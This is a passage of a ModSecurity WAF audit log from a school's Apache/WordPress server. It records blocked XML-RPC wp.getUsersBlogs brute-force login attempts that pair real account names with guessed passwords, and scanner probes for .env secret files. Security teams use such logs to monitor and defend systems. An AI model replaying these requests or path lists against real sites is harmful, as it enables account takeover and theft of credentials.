alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513663110036 4148 (- - -) Stopwatch2: 1745513663110036 4148; combined=2859, p1=410, p2=2310, p3=0, p4=0, p5=81, sr=71, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46e5be12-Z-- --7baaec18-A-- [24/Apr/2025:23:55:23 +0700] aAps-8lQo524fhbIj1yFzwAAABE 103.236.140.4 36880 103.236.140.4 8181 --7baaec18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7baaec18-C-- wp.getUsersBlogs wakasarpras Marketing2021 --7baaec18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7baaec18-E-- --7baaec18-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513723214825 4670 (- - -) Stopwatch2: 1745513723214825 4670; combined=3230, p1=411, p2=2672, p3=0, p4=0, p5=86, sr=84, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7baaec18-Z-- --a7e41c40-A-- [24/Apr/2025:23:56:23 +0700] aAptN_iVYlyO1xhz7yOu_wAAAMg 103.236.140.4 39442 103.236.140.4 8181 --a7e41c40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a7e41c40-C-- wp.getUsersBlogs wakasarpras Mypassword --a7e41c40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7e41c40-E-- --a7e41c40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (114+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513783024440 5095 (- - -) Stopwatch2: 1745513783024440 5095; combined=3442, p1=398, p2=2881, p3=0, p4=0, p5=94, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7e41c40-Z-- --b0f60144-A-- [24/Apr/2025:23:57:28 +0700] aApteN5yz20UX9VrdZPHEgAAAE4 103.236.140.4 42136 103.236.140.4 8181 --b0f60144-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b0f60144-C-- wp.getUsersBlogs wakasarpras 2011 --b0f60144-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0f60144-E-- --b0f60144-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (82+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513848256007 5102 (- - -) Stopwatch2: 1745513848256007 5102; combined=3870, p1=447, p2=3221, p3=0, p4=0, p5=116, sr=106, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0f60144-Z-- --1466f707-A-- [24/Apr/2025:23:57:51 +0700] aAptj8lQo524fhbIj1yHRQAAAAA 103.236.140.4 43088 103.236.140.4 8181 --1466f707-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.97 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --1466f707-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1466f707-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745513871371813 696 (- - -) Stopwatch2: 1745513871371813 696; combined=258, p1=231, p2=0, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1466f707-Z-- --3094fe36-A-- [24/Apr/2025:23:57:51 +0700] aAptj2Luk3f9kLjsdTaEUQAAAIo 103.236.140.4 43114 103.236.140.4 8181 --3094fe36-B-- GET /.env.template HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.97 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --3094fe36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3094fe36-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745513871834080 800 (- - -) Stopwatch2: 1745513871834080 800; combined=353, p1=315, p2=0, p3=0, p4=0, p5=37, sr=136, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3094fe36-Z-- --5c782d11-A-- [24/Apr/2025:23:57:52 +0700] aAptkMlQo524fhbIj1yHRgAAAAY 103.236.140.4 43134 103.236.140.4 8181 --5c782d11-B-- GET /.env.sandbox HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.97 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --5c782d11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c782d11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745513872314791 704 (- - -) Stopwatch2: 1745513872314791 704; combined=297, p1=252, p2=0, p3=0, p4=0, p5=45, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c782d11-Z-- --bee1005f-A-- [24/Apr/2025:23:57:53 +0700] aAptkfiVYlyO1xhz7yOwHwAAAM8 103.236.140.4 43202 103.236.140.4 8181 --bee1005f-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.97 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --bee1005f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bee1005f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745513873769766 787 (- - -) Stopwatch2: 1745513873769766 787; combined=308, p1=267, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bee1005f-Z-- --76a8c210-A-- [24/Apr/2025:23:57:54 +0700] aAptkt5yz20UX9VrdZPHlQAAAEQ 103.236.140.4 43226 103.236.140.4 8181 --76a8c210-B-- GET /.env.preprod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.97 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --76a8c210-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76a8c210-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745513874318226 746 (- - -) Stopwatch2: 1745513874318226 746; combined=314, p1=262, p2=0, p3=0, p4=0, p5=51, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76a8c210-Z-- --26f4946c-A-- [24/Apr/2025:23:57:54 +0700] aAptkslQo524fhbIj1yHVAAAAA4 103.236.140.4 43248 103.236.140.4 8181 --26f4946c-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.97 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --26f4946c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26f4946c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745513874911692 820 (- - -) Stopwatch2: 1745513874911692 820; combined=307, p1=270, p2=0, p3=0, p4=0, p5=36, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26f4946c-Z-- --3f599634-A-- [24/Apr/2025:23:57:55 +0700] aAptk95yz20UX9VrdZPHlgAAAFA 103.236.140.4 43264 103.236.140.4 8181 --3f599634-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.97 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --3f599634-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f599634-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745513875330822 1167 (- - -) Stopwatch2: 1745513875330822 1167; combined=357, p1=290, p2=0, p3=0, p4=0, p5=67, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f599634-Z-- --e9c46728-A-- [24/Apr/2025:23:57:55 +0700] aAptk8lQo524fhbIj1yHWgAAABI 103.236.140.4 43298 103.236.140.4 8181 --e9c46728-B-- GET /prod/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.97 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --e9c46728-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9c46728-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745513875930964 753 (- - -) Stopwatch2: 1745513875930964 753; combined=292, p1=255, p2=0, p3=0, p4=0, p5=36, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9c46728-Z-- --25d25f15-A-- [24/Apr/2025:23:58:28 +0700] aApttPiVYlyO1xhz7yOw-gAAAMc 103.236.140.4 44606 103.236.140.4 8181 --25d25f15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --25d25f15-C-- wp.getUsersBlogs wakasarpras nimda --25d25f15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25d25f15-E-- --25d25f15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (92+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513908061559 5299 (- - -) Stopwatch2: 1745513908061559 5299; combined=3824, p1=446, p2=3199, p3=0, p4=0, p5=104, sr=86, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25d25f15-Z-- --ced65622-A-- [24/Apr/2025:23:59:28 +0700] aApt8PiVYlyO1xhz7yOxzQAAAMw 103.236.140.4 47172 103.236.140.4 8181 --ced65622-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ced65622-C-- wp.getUsersBlogs wakasarpras admin!@# --ced65622-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ced65622-E-- --ced65622-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (126+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513968301345 5403 (- - -) Stopwatch2: 1745513968301345 5403; combined=3819, p1=443, p2=3203, p3=0, p4=0, p5=101, sr=85, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ced65622-Z-- --d94cfc13-A-- [24/Apr/2025:23:59:33 +0700] aApt9clQo524fhbIj1yIQAAAABU 103.236.140.4 47380 103.236.140.4 8181 --d94cfc13-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d94cfc13-C-- wp.getUsersBlogs wakasarpras 1234%^&* --d94cfc13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d94cfc13-E-- --d94cfc13-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513973193984 4879 (- - -) Stopwatch2: 1745513973193984 4879; combined=3896, p1=503, p2=3150, p3=0, p4=0, p5=138, sr=149, sw=105, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d94cfc13-Z-- --e74fab53-A-- [25/Apr/2025:00:00:28 +0700] aApuLMlQo524fhbIj1yI8QAAABU 103.236.140.4 49598 103.236.140.4 8181 --e74fab53-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e74fab53-C-- wp.getUsersBlogs wakasarpras chicken --e74fab53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e74fab53-E-- --e74fab53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514028520181 5189 (- - -) Stopwatch2: 1745514028520181 5189; combined=3701, p1=441, p2=3092, p3=0, p4=0, p5=98, sr=84, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e74fab53-Z-- --1e90471d-A-- [25/Apr/2025:00:01:28 +0700] aApuaGLuk3f9kLjsdTaGngAAAIU 103.236.140.4 52092 103.236.140.4 8181 --1e90471d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1e90471d-C-- wp.getUsersBlogs wakasarpras xbox360 --1e90471d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e90471d-E-- --1e90471d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (127+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514088132236 4163 (- - -) Stopwatch2: 1745514088132236 4163; combined=2747, p1=371, p2=2233, p3=0, p4=0, p5=83, sr=77, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e90471d-Z-- --f408bf24-A-- [25/Apr/2025:00:02:28 +0700] aApupGLuk3f9kLjsdTaHKAAAAIQ 103.236.140.4 54684 103.236.140.4 8181 --f408bf24-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f408bf24-C-- wp.getUsersBlogs wakasarpras manunited --f408bf24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f408bf24-E-- --f408bf24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (119+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514148737962 5525 (- - -) Stopwatch2: 1745514148737962 5525; combined=3864, p1=468, p2=3198, p3=0, p4=0, p5=113, sr=99, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f408bf24-Z-- --a1e86116-A-- [25/Apr/2025:00:03:28 +0700] aApu4MlQo524fhbIj1yK3gAAAA8 103.236.140.4 56980 103.236.140.4 8181 --a1e86116-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a1e86116-C-- wp.getUsersBlogs kasubagtu kasubagtu1987 --a1e86116-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1e86116-E-- --a1e86116-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
